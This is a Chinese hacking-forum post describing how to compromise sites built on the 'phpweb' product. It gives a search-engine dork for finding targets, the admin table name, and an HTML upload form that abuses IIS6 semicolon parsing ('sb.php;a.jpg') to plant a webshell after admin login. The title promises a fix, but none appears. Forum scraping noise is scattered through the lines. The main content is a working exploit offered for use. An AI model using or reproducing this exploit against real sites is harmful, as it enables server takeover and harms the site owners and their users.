找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1969|回复: 0
打印 上一主题 下一主题

phpweb成品网站全版本通杀注入漏洞及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:52:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
关键字:inurl:webmall/detail.php?id& ]& l, B+ C- t9 d  [* \; c  i

# i; n7 v& G/ n2 x数据表:pwn_base_admin+ E1 k, M; b0 e. a; G: Q8 T

6 Z# Y7 S" F  L0 L7 X关于拿shell" M6 m/ C6 O' y( E0 @: s. q
( c; G1 F& {- ~8 ~
首先登录后台admin.php3 K" ?/ Y: L+ X6 u" {
5 X# h& l+ y: {3 V! C
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
, g. m2 R( i3 @/ W7 c, G" C( D换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg' r9 d! ?* `. x  W# `
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
) v0 E$ k+ I2 j5 I<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
. ?. @$ C& k1 y0 a<input type="text" name="fileName" value="sb.php;a.jpg" />
$ d8 E2 P2 U6 e. O, b6 p2 Y* o0 M5 q<input type="hidden" name="attachPath" value="news/pics/" />
1 Z; h% |  ?- w( s, w" {<input type="file" name="fileData" size="14" /></td> - X2 d$ a- ^" u
<input type="submit" name="button" value="确定" />
2 i+ {: i! J( E7 ^1 U</form>! Q; _- `  e- G2 N, H
' X0 q8 B8 h4 q' c% b: X% ]
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。. t# S' y% G" Z  z3 x# T

$ a+ l2 Q# n5 f9 f7 m, ^$ l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表